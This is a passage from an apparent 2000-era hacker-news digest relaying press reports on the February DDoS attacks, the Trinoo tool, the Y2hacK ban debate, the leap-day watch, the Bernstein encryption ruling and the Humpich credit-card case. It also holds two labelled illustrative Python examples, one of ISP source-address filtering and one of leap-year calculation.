      firm ICSA.net in an alliance to prevent denial-of-service
      attacks like the ones that downed several major Web
      sites earlier this month.

      The nine founding members of the Alliance for Internet
      Security promise to adopt security measures that will not
      only make it difficult to attack their computers but, more
      importantly, prevent their systems from being used in an
      attack against others.

      "The members of the Alliance are coming forward to be
      part of the solution and demonstrate their commitment to
      the right thing on behalf of all of the Internet," said Peter
      Tippett, AIS chairman, in a statement.

      "The first step for each of us is to clean up our own
      backyards, ensuring that our systems cannot be used as
      attack agents."

      Starting Feb. 7 with Yahoo! (Nasdaq: YHOO), a series of
      attacks slowed or, in many cases, downed major Web
      sites when a deluge of meaningless data and spurious
      access requests were targeted at their servers by
      unknown attackers.

      By week's end, eBay (Nasdaq: EBAY), E*Trade (Nasdaq:
      EGRP), Buy.com (Nasdaq: BUYX), ZDNet (NYSE: ZDZ),
      CNN, Amazon.com (Nasdaq: AMZN), The Microsoft
      (Nasdaq: MSFT) Network and Excite joined Yahoo! as
      victims of what are known as distributed denial-of-service
      attacks.

      Lessons to be learned
      The lesson for Internet service providers? Individuals and
      businesses on the Internet must not only protect their
      own computers from attack but also make sure the
      systems aren't being used to attack others.

      Each member company must pledge to secure its own internal systems,
      add filtering technology to prevent "spoofing" or forging the source
      address of a piece of data, and provide support for others to do the
      same.

      Founding members include Cable One, Cable & Wireless, Digex, Global
      Crossing and its U.S. subsidiary Global Center, GTE Internetworking,
      Level(3), Road Runner, and Sprint.

      "All Internet users should assure that their own network is
      in order and that their ISP is doing the appropriate filtering
      on behalf of everyone," said Harris Schwartz, director of
      security for Time Warner's (NYSE: TWX) high-speed
      Internet provider, Road Runner.

      Broadband providers offering individuals and small
      businesses fast connections are quickly becoming a
      stomping ground for Web vandals looking for easy
      targets.

      Most customers security-challenged
      Most users of such services know little of how to secure
      their systems -- and as many as 10 percent of such
      systems are completely open to anyone on the network.

      Educating such users about their role in making the
      Internet secure should be a top priority, said Stephen E.
      Cross, director of Carnegie Mellon University's Software
      Engineering Institute, speaking Wednesday before the
      Congressional Joint Economic Committee.

      "Support programs that provide early training in security
      practices and appropriate use ... should be integrated into
      general education about computing," Cross said.

      Yet, for the most part, the AIS will continue to overlook
      users and instead focus on businesses.

      Users on their own
      "This is about companies that are Internet-connected
      companies," said Laurie Wagner, senior vice president of
      business development for ICSA.net.

      Wagner pointed out that the alliance first needs to
      concentrate on the 5,000 or so small Internet providers
      that may not know much about security.

      For now, users are on their own, she said. "ISPs are not
      being paid to be security consultants for their users."
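
      The source-address filtering the Alliance members pledge to deploy,
      sketched as an added example (not part of the ZDNet article or HNN's
      text): a provider edge forwards a packet from a customer-facing
      interface only when its source address lies inside a prefix assigned to
      that interface. The interface names, prefixes and sample packets are
      constructed for illustration.

```python
"""Source-address validation at a provider edge (added example)."""
import ipaddress
from collections import Counter

# Constructed assignments: customer-facing interface -> prefixes delegated to it.
# Interface names and documentation-range prefixes are assumptions.
ASSIGNED = {
    "cust-a": ["192.0.2.0/25"],
    "cust-b": ["192.0.2.128/25", "198.51.100.0/24"],
}

OUTSIDE = "source outside assigned prefix"
MALFORMED = "malformed source address"
UNKNOWN_IFACE = "unknown interface"

# Constructed sample traffic: (ingress interface, claimed source, destination).
SAMPLE = [
    ("cust-a", "192.0.2.10", "203.0.113.5"),    # inside cust-a's prefix
    ("cust-a", "198.51.100.7", "203.0.113.5"),  # cust-b's space on cust-a's port
    ("cust-b", "198.51.100.7", "203.0.113.5"),  # inside cust-b's prefix
    ("cust-b", "10.1.2.3", "203.0.113.5"),      # private space, never assigned
    ("cust-a", "203.0.113.5", "203.0.113.5"),   # source not assigned to cust-a
    ("cust-b", "not-an-ip", "203.0.113.5"),     # malformed record
]


def build_table(assigned):
    """Parse prefix strings once; strict=True rejects prefixes with host bits set."""
    return {
        iface: [ipaddress.ip_network(p, strict=True) for p in prefixes]
        for iface, prefixes in assigned.items()
    }


def check_source(table, iface, src):
    """Return (verdict, reason) for a packet arriving on a customer interface."""
    networks = table.get(iface)
    if networks is None:
        return "drop", UNKNOWN_IFACE
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return "drop", MALFORMED
    # Membership is False when address and network differ in IP version.
    if any(addr in net for net in networks):
        return "forward", "source within assigned prefix"
    return "drop", OUTSIDE


def filter_traffic(table, packets):
    """Split packets into forwarded ones and per-(interface, reason) drop counts."""
    forwarded, dropped = [], Counter()
    for iface, src, dst in packets:
        verdict, reason = check_source(table, iface, src)
        if verdict == "forward":
            forwarded.append((iface, src, dst))
        else:
            dropped[(iface, reason)] += 1
    return forwarded, dropped


if __name__ == "__main__":
    fwd, drops = filter_traffic(build_table(ASSIGNED), SAMPLE)
    for pkt in fwd:
        print("forward", pkt)
    for (iface, reason), count in sorted(drops.items()):
        print("drop", iface, reason, count)
```

      The per-interface drop counters are the useful by-product: a customer
      port that keeps sending out-of-prefix sources is either misconfigured
      or hosting an attack agent.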
      
      
      @HWA
      
83.0  HNN:Feb 24th:Proposed Y2hacK Ban Not Getting Support
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
       
      contributed by no0ne 
      
      The proposed ban on the upcoming hacker con Y2hacK to be held in Israel
      is not gaining support. Speaking in a meeting of the Committee for
      Scientific and Technological Research and Development, Michael Eitan
      said that "canceling the conference would be a mistake, and a missed
      opportunity to learn from the hackers". The sentiment that "hackers are
      not always crackers" was also echoed in the meeting. (Glad that they
      understand that in Israel.)
      
      
      Wired
      http://www.wired.com/news/politics/0,1283,34504,00.html
      
      
      Victory for Israel Hack Meet? 
      by Tania Hershman 
      
      1:55 p.m. 23.Feb.2000 PST 
      TEL AVIV -- A proposed ban on the upcoming worldwide hacker conference
      to be held here is not gaining support and Y2hacK is likely to go on 
      as planned. 
      
      Michael Eitan said Tuesday during a meeting of the Knesset's Committee
      for Scientific and Technological Research and Development that canceling
      the conference would be a mistake -- and a missed opportunity to learn 
      from the hackers. 
      
      Last week, committee head Anat Maor wrote a letter to the attorney general
      calling for the worldwide hacker conference to be outlawed. 
      
      "It's absurd. [Hacking] is illegal in Israel and many other countries, 
      including the US," Maor said. "If there was going to be a conference of
      thieves, or a conference of men who beat their wives, how would you feel?
      You can't allow a conference that goes against the law." 
      
      The attorney general has yet to respond. 
      
      "It's a pity she didn't consult with me about the letter she sent to the
      attorney general," said the Knesset's Eitan, addressing a crowd that included
      representatives from Israel's largest ISP, Netvision, the Israel Chapter of 
      the Internet Society, and security software company Aladdin, as well as 
      politicians and lawyers from the Israeli Bar Association. 
      
      Opinions offered at the meeting were overwhelmingly in favor of allowing 
      the conference for the sake of freedom of expression. Several participants
      also emphasized that hackers are not always crackers. 
      
      To illuminate the difference, colorful comparisons were drawn between the 
      criminal who sees an unlocked car and steals it and the concerned citizen 
      who leaves a note in the car informing the driver that it's unlocked. 
      Maor acknowledged at the meeting that her initial outrage regarding Y2hacK
      may have been a little hasty. 
      
      Although she was not being invited to the committee meeting, Shem Shaul,
      a UNIX specialist and journalist who got her first job in journalism by 
      hacking into Israel's Globes news site, was pleased with the tone of the
      meeting. 
      
      "I talked to Michael Eitan last night and explained some technical and 
      ethical issues," Shaul said. "He knows me from the university and from 
      journalism and he was very open. [Anat Maor] seemed to understand what 
      a mistake she had made, and reached a better conclusion." 
      
      Shaul and the Y2hacK team had sent Maor an official response to her
      letter to the attorney general. 
      
      "A lot of these so-called hackers grow up to be the visionaries and 
      founders of the Israeli ever-expanding hi-tech industry. President 
      Clinton has realized that, and hired a hacker to advise on the security
      of the White House," the letter stated. 
      
      Several messages on the Y2hacK site's bulletin board reiterated support
      for the conference. 
      
      "This whole situation could've been avoided had Anat looked at the list
      of lectures," Cyphunk wrote. "The subjects being covered are very important
      for system administrators and other 'security professionals'. [I] imagine 
      that what happened was Anat heard the word 'hacker' and started to fume." 

      
      
      
      @HWA
       
      
       
      
84.0  HNN:Feb 24th:Microsoft Web Sites Attacked
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Weld Pond 
      
      Microsoft said that it was hit with a syn-flood attack last Tuesday
      morning. The attack slowed down website responsiveness between 3 and 7
      percent. No damage occurred and no access into Microsoft Systems was
      gained. (And why is this news? This sort of thing happens all the
      time.)
      
      Reuters - via Excite
      http://news.excite.com/news/r/000223/20/tech-hackers-microsoft
      (404)
      
      @HWA
      
85.0  HNN:Feb 24th:New DDoS Tool Released
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
       
      contributed by William Knowles 
      
      A new Windows version of Trinoo has been released. This new version will
      make it much easier to launch distributed denial of service attacks
      similar to those that recently hit Yahoo, ZDnet, CNN and others.
      
      C|Net
      http://news.cnet.com/category/0-1005-200-1555637.html
      
     New hacker software could spread by email 
     By John Borland
     Staff Writer, CNET News.com
     February 23, 2000, 4:35 a.m. PT 

     A group of anonymous programmers has released a new version of the software 
     that shut down Yahoo and Amazon.com earlier this month--one that makes it 
     far easier to launch attacks, computer experts say. 

     The tools, a new version of a software package dubbed "Trinoo," could allow 
     attackers to infiltrate ordinary desktop computers through an 
     innocent-looking email attachment. These computers--particularly those 
     connected to high-speed Internet services--could then be used as unwitting 
     accomplices in assaults on other Web sites, security analysts say. 

     "(The previous attacks) took someone who knew what they were doing," Trend 
     Micro spokesman David Perry said. "This turns it into a kid-on-the-street 
     problem." 

     The release of these tools follows some of the highest-profile computer 
     attacks in the Web's history. Using a method dubbed "distributed denial of 
     service attacks," computer vandals successfully rendered Yahoo, Amazon, 
     eBay and a handful of other big Web sites paralyzed for hours at a time by 
     swamping them with a multitude of simultaneous attacks. 

     The attacks have spurred law enforcement investigations around the globe, 
     but the FBI has not reported any major breakthroughs in the case. 

     Some speculation has centered on several individuals with hacker nicknames 
     like "mafiaboy." Canadian authorities investigated an Internet service 
     provider (ISP) last week that once hosted a "mafiaboy" hacker-related site. 
     But Canadian police said today they had no progress to report in their 
     investigation. 

     While no conclusive evidence has been released on exactly what tools were 
     used in the denial of service attacks, recent speculation has focused on 
     tools with names like Trinoo, Tribal Flood Network and Stacheldraht 
     (German for "barbed wire"). 

     These tools allow an attacker to place agents on "zombie" computers around 
     the world and then wake them up simultaneously to launch a crippling stream 
     of Web traffic at a target site. Security officials at the FBI and other 
     computer security agencies have been warning of the danger these tools pose 
     for several months and have provided software to help guard against their 
     use. 

     But the new version of Trinoo heightens the danger because it makes attacks 
     easier to launch. Because the new version can infiltrate Windows NT, 
     Windows 95 and Windows 96-based machines, far more computers are at risk of 
     becoming hosts. 

     The Windows version also allows the tools to be spread as apparently 
     innocuous email attachments, much like ordinary viruses. Computer security 
     experts say they haven't seen this happen yet, but that the Windows 
     platform makes it relatively easy to do. 

     "This does make (denial of service attacks) easier," said Elias Levy, chief 
     technical officer for SecurityFocus.com, a computer security Web site. "Not 
     that it required a lot of intelligence or skill before. But this does bring 
     it down another notch." 

     The new tools are largely a threat to users with always-on digital 
     subscriber line or cable modem connections, analysts said. 

     This kind of threat has been seen before with the Back Orifice software, 
     Levy noted. That package, once surreptitiously installed on a system, 
     allows an outside person to control the computer remotely. The Trinoo 
     package is geared more specifically for launching denial of service 
     attacks, however. 

     Most of the major anti-virus firms have already developed or are developing
     tools to scan for and remove the new Trinoo software. 
      
      
      @HWA
      
86.0  HNN:Feb 25th:NDB Hit by Cyber Vandals
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by acopalyse 
      
      NDB, an online broker, was cut off for more than an hour yesterday
      because of what it said was an attack by computer vandals. National
      Discount Broker Group, based in Jersey City, said that the company had 
      taken precautionary measures in light of recent attacks but that they
      had clearly not worked. (Hmmmm, not a whole lot of technical
      information here, who knows what really happened.)
      
      New York Times
      http://www.nytimes.com/library/tech/00/02/biztech/articles/25hack.html
      (Pay to play..)
      
      @HWA 
      
87.0  HNN:Feb 25th:Y2K Leap Day
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
       
      contributed by Evil Wench 
      
      John Koskinen, President Clinton's Year 2000 Czar told reporters that
      the US and about a dozen other countries will work together to track any
      automated-system failures sparked by a leap day next week. Leap days
      occur only once every 400 years.  No major system failures are expected.
      Plans for the future of the state-of-the-art computer facility built for
      the Y2K rollover have not yet been announced.
      
      ZDNet
      http://www.zdnet.com/zdnn/stories/news/0,4586,2448220,00.html?chkpt=zdnntop
      
      Y2K alert ... again? Beware 'leap day'

      'A real issue we feel obligated to keep track
      of,' warns Clinton's Year 2000 technology
      whiz, as the U.S. and others gear up for
      possible Feb. 29 digital snafus.



      By Reuters 
      February 24, 2000 4:13 PM PT 


      The United States and about a dozen countries will
      work together to track any automated-system
      failures sparked by a leap day next week that
      occurs only once in 400 years, the U.S. government
      said Thursday. 

      "It's a real issue that we feel obligated to keep track of,"
      John Koskinen, President Clinton's chief aide for Year
      2000 technology problems, told reporters at a $50 million
      Y2K monitoring station. 

      Koskinen said he did not expect any major system
      failures, largely because organizations typically checked
      for leap-year compliance while troubleshooting for the
      so-called Y2K bug. 

      "If there are difficulties in many cases it will result in
      minor or modest glitches that can be remedied quickly if
      people catch it quickly," he said. 

      To keep tabs internationally, Koskinen will take part in
      scheduled conference calls every eight hours over a
      three-day period with national Y2K coordinators on the
      steering committee of the World Bank-funded
      International Y2K Cooperation Center. 

      This group includes Britain, Bulgaria, Chile, Gambia,
      Iceland, Japan, Mexico, Morocco, the Netherlands and
      South Korea. Australia and New Zealand have also been
      invited to take part because they can give early warning
      shortly after Feb. 29 dawns at the international date line. 

      Info center finds new purpose
      The $50 million information coordination center set up
      under White House auspices to track Y2K glitches will be
      operational from Feb. 28 to March 1. It will be staffed from
      7 a.m. to 9 p.m. by about 75 federal workers per shift,
      about half as many as for the century date change, when
      it ran around the clock. 

      The greatest leap-day risk is to custom software used for
      record keeping or billing, especially where the number of
      days is central to the process being carried out, such as
      computing interest, Koskinen said. 

      Unlike the Y2K issue -- where the use of only two digits
      to signify the year was standard practice (see ZDNet
      News' Y2K Special Report) -- the potential leap-year
      problem results from misunderstanding the rule for when
      an extra day is added to the calendar. 

      The three-step rule
      Under the little-known three-step rule, February picks up
      a 29th day in years divisible by 4 except when the year is
      divisible by 100 -- unless the year is divisible by 400. 

      Thus, the year 2000 is the first leap year of its kind since
      1600. The three-step rule was crafted for the calendar
      introduced by Pope Gregory XIII in 1582 to better
      synchronize with the cycle of the seasons. The years
      1700, 1800 and 1900 were not leap years. 

      Koskinen said previous testing found that some software
      programmers knew enough of the leap-year rule to get to
      its second step. That would mean they could have coded
      2000 as a normal year, in which February had 28 days,
      instead of the 29 required. 

      Koskinen, who chairs the President's Council on Year
      2000 Conversion, said he would brief journalists on any
      glitches at 2 p.m. Feb. 29 and March 1. 

      At the final briefing, he said he would announce White
      House plans for the future of the state-of-the-art computer
      systems built for the rollover watch post. 
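
      The three-step rule from the Reuters article above, next to the
      two-step shortcut Koskinen describes, as an added example (not part of
      the article): it lists the years where the two rules disagree and shows
      the effect on a day count and an interest calculation spanning February
      2000. The epoch, the Actual/365 convention and the loan figures are
      assumptions chosen for the example.

```python
"""Leap-year rule: the two-step shortcut beside the full three-step rule."""
import calendar
from decimal import Decimal

MONTH_DAYS = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
EPOCH = 1900  # day numbers count from 1 Jan 1900 (arbitrary choice for the example)


def is_leap_two_step(year):
    """Flawed: stops at step two, so every century year is treated as common."""
    return year % 4 == 0 and year % 100 != 0


def is_leap_three_step(year):
    """Full Gregorian rule: century years are leap only when divisible by 400."""
    return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)


def agrees_with_stdlib(first, last):
    """Cross-check the three-step rule against Python's calendar module."""
    return all(is_leap_three_step(y) == calendar.isleap(y)
               for y in range(first, last + 1))


def divergent_years(first, last):
    """Years in [first, last] where the two rules disagree."""
    return [y for y in range(first, last + 1)
            if is_leap_two_step(y) != is_leap_three_step(y)]


def day_number(ymd, leap_rule):
    """Days since 1 Jan EPOCH under leap_rule; rejects dates the rule thinks impossible."""
    year, month, day = ymd
    lengths = MONTH_DAYS[:]
    if leap_rule(year):
        lengths[1] = 29
    if year < EPOCH or not 1 <= month <= 12 or not 1 <= day <= lengths[month - 1]:
        raise ValueError("invalid date under this rule: %04d-%02d-%02d"
                         % (year, month, day))
    whole_years = sum(366 if leap_rule(y) else 365 for y in range(EPOCH, year))
    return whole_years + sum(lengths[:month - 1]) + day - 1


def days_between(start, end, leap_rule):
    """Elapsed days from start to end, both (year, month, day) tuples."""
    return day_number(end, leap_rule) - day_number(start, leap_rule)


def simple_interest(principal, annual_rate, start, end, leap_rule):
    """Actual/365 simple interest (convention assumed for the example)."""
    return principal * annual_rate * days_between(start, end, leap_rule) / 365


if __name__ == "__main__":
    start, end = (2000, 2, 15), (2000, 3, 15)
    print("rules disagree in:", divergent_years(1583, 2400))
    for name, rule in (("two-step", is_leap_two_step),
                       ("three-step", is_leap_three_step)):
        days = days_between(start, end, rule)
        owed = simple_interest(Decimal("100000"), Decimal("0.073"), start, end, rule)
        print("%-10s days=%d interest=%s" % (name, days, owed))
    try:
        day_number((2000, 2, 29), is_leap_two_step)
    except ValueError as exc:
        print("two-step rule rejects a real date:", exc)
```

      Two failure modes show up: the flawed rule rejects 29 Feb 2000 outright,
      and every day count crossing that date comes out one day short.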
      
      
      @HWA
      
88.0  HNN:Feb 25th:Bernstein Allowed to Post Snuffle
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Evil Wench 
      
      The Commerce Department has confirmed that the new encryption export
      policy does permit Daniel Bernstein to post his 'Snuffle' program to
      the web without obtaining an export license. Snuffle is a piece of
      strong encryption software that has been the subject of a free speech
      lawsuit.
      
      C|Net
      http://news.cnet.com/news/0-1005-200-1556935.html?tag=st.ne.1002.bgif.1005-200-1556935
      
      Professor allowed to post encryption program online 
      By Reuters
      Special to CNET News.com
      February 24, 2000, 11:00 a.m. PT 

      WASHINGTON--The United States will let a computer scientist put 
      instructions for writing a powerful computer data-scrambling program on 
      his Web site, but his high-profile lawsuit challenging U.S. export 
      restrictions on encryption may continue, his lawyer said today.

      President Clinton in January dramatically liberalized once-strict U.S. 
      export limits on encryption programs, which scramble information and 
      render it unreadable without a password or software "key." The changes 
      recognized that encryption, used in everything from Web browsing 
      software to cellular telephones, has become essential for securing 
      e-commerce and global communications. 

      The move also followed a May 6 decision by a three-judge panel of the 
      U.S. Ninth Circuit Court of Appeals that the old rules barring University 
      of Illinois professor Daniel Bernstein from posting instructions for his 
      "Snuffle" program on the Internet were an unconstitutional violation of 
      the scientist's freedom of speech. 

      But in January, the full court asked the panel to reconsider the ruling 
      in light of the new Clinton policy. 

      In a private advisory letter sent last week, the Commerce Department 
      confirmed that the new encryption export policy permitted Bernstein to 
      post instructions, called source code, for his program on the Internet 
      for all to see. Any other computer programmer could easily compile the 
      source code into a functioning program. 

      "In light of the changes in licensing and review requirements for 
      publicly available source code, the new regulations do not interfere 
      with his planned activities as you have described them," the Commerce 
      Department letter said in response to a letter from Bernstein's lawyer. 

      Under the old rules, Bernstein had to obtain an export license for each 
      person who wanted to view his Web site from outside the United States--an 
      impossible task given the Net's global reach. But the new rules allow 
      anyone to post encryption source code on the Internet as long as 
      they also send a copy to the government and do not charge royalties for 
      use of the code. 

      "We are still considering our options," said Cindy Cohn, Bernstein's 
      lawyer. Cohn said the Commerce Department letter failed to clear up some 
      questions about the new rules. 

      The department did make it clear that a Web site that merely picked up 
      code posted by someone else, a practice known as mirroring, would not be 
      held responsible for following the export rules. And Bernstein or others 
      would not have to notify the government again each time they posted 
      bug fixes or updates. 

      Bernstein's lawsuit came about because under the old rules, a book 
      containing computer source code could be shipped out of the United States 
      without restriction, but the same source code posted on the Internet or 
      put on a floppy disk could not be "exported" without a license. 

      
      
      @HWA
      
89.0  HNN:Feb 26th:FBI Hit with DOS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by hantai and William Knowles
      
      The FBI has acknowledged that their web site was hit with a denial of
      service attack which forced it off line for several hours on the 18th.
      Unfortunately there are almost no technical details in this
      article.
      
      Associated Press - via San Jose Mercury News
      http://www.sjmercury.com/svtech/news/breaking/ap/docs/252799l.htm
      
      FBI admits its site was attacked

      BY TED BRIDIS AP Technology Writer 

      WASHINGTON (AP) -- The FBI acknowledged Friday that electronic vandals 
      shut down its own Internet site for hours last week in the same type 
      of attack that disrupted some of the Web's major commercial sites.

      The bureau's Web site, www.fbi.gov, remained inaccessible for more than 
      three hours Feb. 18 because vandals overwhelmed it by transmitting 
      spurious signals.

      ``The FBI has made comments they're going to find who's responsible for 
      the latest attacks, so it's a bit of war between the hackers and the 
      bureau,'' said James Williams, a Chicago lawyer and former FBI agent who 
      specialized in investigating computer crimes.

      The technique, which doesn't require particular sophistication, is similar 
      to repeatedly dialing a phone number to block all other incoming calls. 
      Last year, the FBI pulled down its World Wide Web site for days 
      after hackers overwhelmed it using the same type of attack.

      No one has claimed responsibility for launching last week's attack against 
      the same law enforcement agency that is investigating serious disruptions 
      earlier this month at Yahoo!, eBay, ETrade, Amazon.Com and others.

      ``Pretty much anyone is a target,'' agreed John McGowan, a research 
      engineer at ICSA.Net, a computer security firm. He wasn't surprised no one 
      has claimed credit.

      ``I don't think I'd want to go around bragging that it was my group that 
      shut down the FBI,'' McGowan said. ``They're certainly turning up the 
      carpets and looking for anything they can find.''

      The FBI said last week that it couldn't determine whether the problem was 
      a technical fault or malicious attack, but a spokeswoman, Deborah 
      Weierman, confirmed Friday that vandals were responsible. She 
      declined to say whether there was any evidence, other than the coincidence 
      in timing, to link last week's attack against the FBI to those against 
      other Web sites.

      The FBI noted that its computers weren't broken into, and that its 
      affected Internet site is separate from all its internal systems, 
      including investigative files. ``We have had no more problems since 
      then,'' Weierman said.

      Engineers at IBM, who run the FBI's Internet site under a federal 
      contract, ``took the appropriate steps to get our Web site back and 
      running (and) continue to look into remedies and actions to minimize
      this from happening again,'' Weierman said.


      
      
      @HWA
      
90.0  HNN:Feb 26th:Police Monitor 170,000 Pay Phone Calls
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by indie slide 
      
      This article deals mostly with how a major player inside the Canadian
      Mafia was tracked down and arrested. The interesting part is the
      explanation of his arrest in which the police traced his fingerprints
      from a thrown away prepaid calling card. The article goes on to say how
      the police monitored the outgoing phone calls from 85 separate pay
      phones (a total of 170,000 calls) from businesses and malls he was known
      to visit in order to trap any calls he placed. (That's a lot of
      calls, wonder how many personal calls were accidentally listened
      to?)
      
      National Post
      http://www.nationalpost.com/home.asp?f=000226/217309
      
      
      
      @HWA 
      
       
      
91.0  HNN:Feb 26th:Echelon on 60 Minutes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Weld Pond 
      
      An interview with former spy Mike Frost appeared on 60 Minutes Sunday
      night. The interview covered the NSA's involvement with the global spy
      network known as Echelon. In traditional intelligence agency spin
      control, the NSA has issued a letter about the show to Congress.
      
      CBS
      http://cbsnews.cbs.com/now/section/0%2C1636%2C3415-412%2C00.shtml
      
      
      NSA letter to Congress
      http://www.fas.org/sgp/news/2000/02/nsalet.html
      
      (Contains graphics) check url for article with diagrams.

      
      
      @HWA
      
92.0  HNN:Feb 26th:French Smart Card Researcher Sentenced
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by acopalyse 
      
      Serge Humpich, the 36 year-old engineer who discovered flaws in the
      chip-based security of French credit cards, has been sentenced to a
      suspended prison sentence of 10 months, 12,000 francs (approx. 1,200) in
      fines, and one symbolic franc in damages to the Groupement des Cartes
      Bancaires. After he had discovered significant flaws in the
      authentication system of French credit cards he attempted to sell the
      information to the Banks, who in turn conspired to have him arrested.
      (Instead of fixing the problem have the guy arrested, great
      strategy.)
      
      The Register UK
      http://www.theregister.co.uk/000226-000001.html
      
      The Liberation - French
      http://www.liberation.fr/quotidien/semaine/20000226sams.html
      
      
      
      Register;
      
      SATURDAY MARCH 11TH 2000  
      
      Posted 26/02/2000 8:41am by Cedric Ingrand

      French credit card hacker convicted

      Serge Humpich, the 36 year-old engineer who discovered flaws in the 
      chip-based security of French credit cards, was sentenced yesterday in 
      Paris. 

      Under the ruling issued by the 13th correctional chamber, he was sentenced 
      to a suspended prison sentence of 10 months, 12,000 francs (approx. 
      1,200) in fines, and one symbolic franc in damages to the Groupement des 
      Cartes Bancaires. His computer equipment has been seized, as well as the 
      document that he had filed with the INPI (France's patents and trademarks 
      office), detailing his findings. 

      Humpich began studying credit card security four years ago. When he 
      discovered significant flaws in the authentication system, he contacted 
      the Groupement des Cartes Bancaires, through lawyers, to negotiate a 
      "technology transfer" of his discovery, for an undisclosed amount 
      (estimates of up to 20M were never confirmed by either party). 

      During Court hearings held on January 21 it was revealed that Humpich had 
      committed only one fraud (when he bought metro tickets using cards he 
      made), performed at the instigation of the GCB, and using the blank cards 
      that it had supplied. 

      Little did he know that the GCB had already contacted the authorities, and 
      that his phone was tapped. Humpich was later arrested, his equipment 
      seized, and his house (as well as his lawyers' offices) raided by police. 

      Inventing the 57 franc note

      "My intention was always to negotiate the results of my invention", 
      Humpich told The Register. "My mistake was dealing with such a 
      formidable opponent. Had I not been duped about their true intentions, 
      no one would have ever heard a word about the whole thing." 

      Convicted for "counterfeiting credit cards", Humpich doesn't consider his 
      work forgery. "It's just as if I'd designed a perfect 57 francs bill," 
      Humpich smiles. 

      Although his conviction validates his findings in a way, he is quick to 
      correct that the cards he manufactured were not copies of existing cards, 
      but rather spoof cards that could fool point-of-sale terminals (i.e. not 
      hardwired into the banks' computers), which would deem the doctored cards 
      valid. 

      Understandably reluctant to go into too much detail, Humpich does 
      acknowledge that the cards he made could have arbitrary numbers, and be 
      used with any four-digit PIN code. 

      At the heart of the case lies the crypto authentication algorithm used by 
      the cards, that relies on a 96 digit key computed from a 321 bit public 
      key. Part of Humpich's breakthrough was the factoring of that public key. 
      Evidence has come up that the system in use in most cards today was deemed 
      unsafe by experts as far back as 1988. 

      Documents backing the claim have been posted on a website 
      (www.humpich.com) hosted by supporters of Humpich. According to the 
      documents, the 96 digit key standard dates back to the original 1983 
      design, and was never upgraded to keep up with computing power. 
      Apparently, French banks need a serious refresher course on Moore's law. 

      Another fine mess

      Chip cards have been implemented in French credit cards since 1992. In 
      a classic case of security through obscurity, GCB won't discuss the 
      specifics of credit card security, staunchly defending the official 
      line that "chip cards are the safest around, with tremendous benefits 
      on fraud statistics." However, in a recent interview, the GCB stated 
      that a long, hard low-tech look at the hologram imprinted in the cards, 
      was the best way for a retailer to check a card's validity. 

      Retrofitting POS terminals to patch up security could cost banks as much 
      as 3 billion, according to some estimates. 

      ATM cash terminals, which only use the data stored on the card's magnetic 
      stripe for reasons of backwards compatibility with foreign (i.e. 
      chip-less) cards, are not prone to the flaws discovered by Humpich. 

      "Right now, a credit card is about as safe as a Post-It note," Humpich 
      says. "I have proved that their protection can be circumvented, and they 
      have yet to fix the flaws. But that would mean admitting that they were 
      negligent in the first place." 

      When asked if he thinks that others will pick up his work where he left 
      it, Humpich answers that it will be "much easier for them now that all 
      this is into the open. Some are really close to the solution now". 
      Already, anonymous messages on Usenet are providing details on the keys 
      used for credit card authentication. 

      The French credit card safety saga rumbles on, despite Humpich's 
      conviction. In an open statement, eight French consumer associations 
      demanded that banks provide a full disclosure on credit card safety. The 
      affair could undermine France's attempts at exporting this chip 
      technology, as well as the prospects of installing cheap card readers on 
      PCs as a means of authenticating e-commerce transactions. 

      "You know, I didn't put them in the mess they're in today," Humpich says. 
      His lawyers plan to appeal the conviction.  
      
      
      Liberation (translated from French);
      
      The courts extend no credit to the bank card pirate
      Suspended prison sentence and fine, although he pleaded good faith.

      By PASCALE NIVELLE

      Saturday 26 and Sunday 27 February 2000
      
       On Friday the Paris criminal court sentenced Serge Humpich, the bank
       card "pirate", to a ten-month suspended prison sentence and to pay
       one symbolic franc to the plaintiff, GIE-CB (Groupement d'intérêt
       économique cartes bancaires). A half-and-half verdict, more lenient
       than what the public prosecutor had sought (two years suspended and a
       50,000 franc fine), but harsher than the defence had hoped, having
       fiercely argued for acquittal on 21 January before the thirteenth
       chamber. "I don't understand the justice system at all... This is a
       verdict that encourages fraud," the engineer said as he left the
       hearing. 

       An open sesame. For he never intended to commit fraud. In 1997, after
       four years of research in the loft of his farmhouse in
       Seine-et-Marne, this computer engineer came up with the formula that
       hackers (computer pirates) the world over dream of. How to breach the
       security system of bank cards: first cobble together a fake card,
       assign it an unreadable code and see "code OK" displayed in every
       case. An open sesame to unlimited credit at cash dispensers and at
       the payment terminals of the 600,000 French merchants who are members
       of GIE-CB. 

       In July 1998 he filed his invention with the INPI (Institut national
       de la propriété industrielle) under the title "how to make a fake
       Carte bleue" and contacted the GIE through a business lawyer and an
       industrial property adviser. He intended to cash in on his discovery
       and sign a "transfer of know-how" contract with them. The secret in
       exchange for a large sum of money, a common practice in the business
       world. "For the GIE, learning of the flaw in its security system
       meant finding a new defence against fraud," the engineer explains.
       Sceptical at first, the GIE let him come forward and ended up
       accepting the deal when Serge Humpich, in the presence of a bailiff,
       obtained ten books of metro tickets at a Paris station. 

       In fact, the GIE had already filed a complaint. In August 1998 Serge
       Humpich was tailed and his phone tapped. In September he was taken
